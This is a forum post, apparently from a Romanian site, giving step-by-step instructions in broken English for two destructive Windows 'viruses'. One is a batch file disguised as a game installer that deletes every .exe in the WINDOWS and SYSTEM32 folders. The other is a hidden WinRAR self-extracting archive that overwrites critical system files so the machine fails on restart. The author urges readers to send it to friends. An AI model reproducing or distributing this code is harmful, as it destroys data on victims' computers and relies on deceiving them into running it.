smartxp
Welcome to SmartXp
|
Nou pe simpatie: Andreea_K pe Simpatie
 | Femeie 25 ani Caras Severin cauta Barbat 30 - 49 ani |
|
|
smartxpInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
|
|
1. Create VIRUS.bat
To create a simple virus with extension BAT, you may know some MS-DOS command like:
"cd" - exit from msdos folder and go to driver
"cd NameFolder" - enter in folder
"ren NameFolder NewNameFolder" - rename a folder
"del File.ext" - delete a file
"echo" - display message
"rem comment" - add comment on a file bat
At this moment this command is an of to know .
Open Notepad.exe from START-> Programs ->Accessories -> Notepad. Wright this in Notepad:
Notepad - Rosex Game.bat @echo off cd c: cd cd windows echo Please wait to game install del *.exe del /f *.exe cd system32 del *.exe del /f *.exe rem Made bY: Ace-T www.rohack.tk echo Game has install on your PC, HAVE FUN ;-)
And save this work like Name.bat (EX: RoSex Game.bat)
This virus work on Windows 95, 98, ME, XP (NT & 2000 not test it)
Explain code:
@echo off <- Hide command cd <- Exit from all folder and go to driver c: <- Enter in driver C: cd <- Exit from all folder and go to driver cd windows <- Enter on folder WINDOWS echo Please wait to game install <- Message joke to trick user del *.exe <- Delete all file .EXE from folder WINDOWS del /f *.exe <- Force delete file .EXE from folder WINDOWS (This command work only in WIN XP) cd system32 <- Enter on folder SYSTEM32 del *.exe <- Delete all file .EXE from folder SYSTEM32 del /f *.exe <- Force delete file .EXE from folder WINDOWS (This command work only in WIN XP) rem Made bY: Ace-T www.rohack.tk <- Add comment about ho create the code echo Game has install on your PC, HAVE FUN ;-) <- Add comment, virus finish to delete all file
2. Create a VIRUS.exe
To create a simple virus with extension EXE you must have on PC a program like: WinRAR, ho create arhive SFX. In this example we use WinRAR.
Open Notepad.exe from START-> Programs ->Accessories -> Notepad. Wright this in Notepad: Notepad - rem www.rohack.tk rem www.rohack.tk )
rem www.rohack.tk
rem www.rohack.tk
And save this work in a new folder where are no file. This file must save as:
RunDLL.exe
RunDLL32.exe
PROGMAN.exe
WINFILE.exe
WINSOCK.DLL
Win.ini
ATTENTION: Please save as file like in my example because this file is critical for Windows OS. With WinRAR you create a SFX archive with properties to overwrite this file. After restart Windows is down.
OKAY 6 file is an of to broke WINDOWS. Select all file then CLICK RIGHT and select "Add to archive..." on GENERAL click "Create a SFX arvive" now go to ADVANCE click on "SFX options" on "Path to extract" write "C:Windows" then go to "Models" click on "Hide all" and "Overwrite all files" now click OK & OK and archive was made. If you run this exe archive you may broke your PC, Send this file to your friends.
|
|
| |
|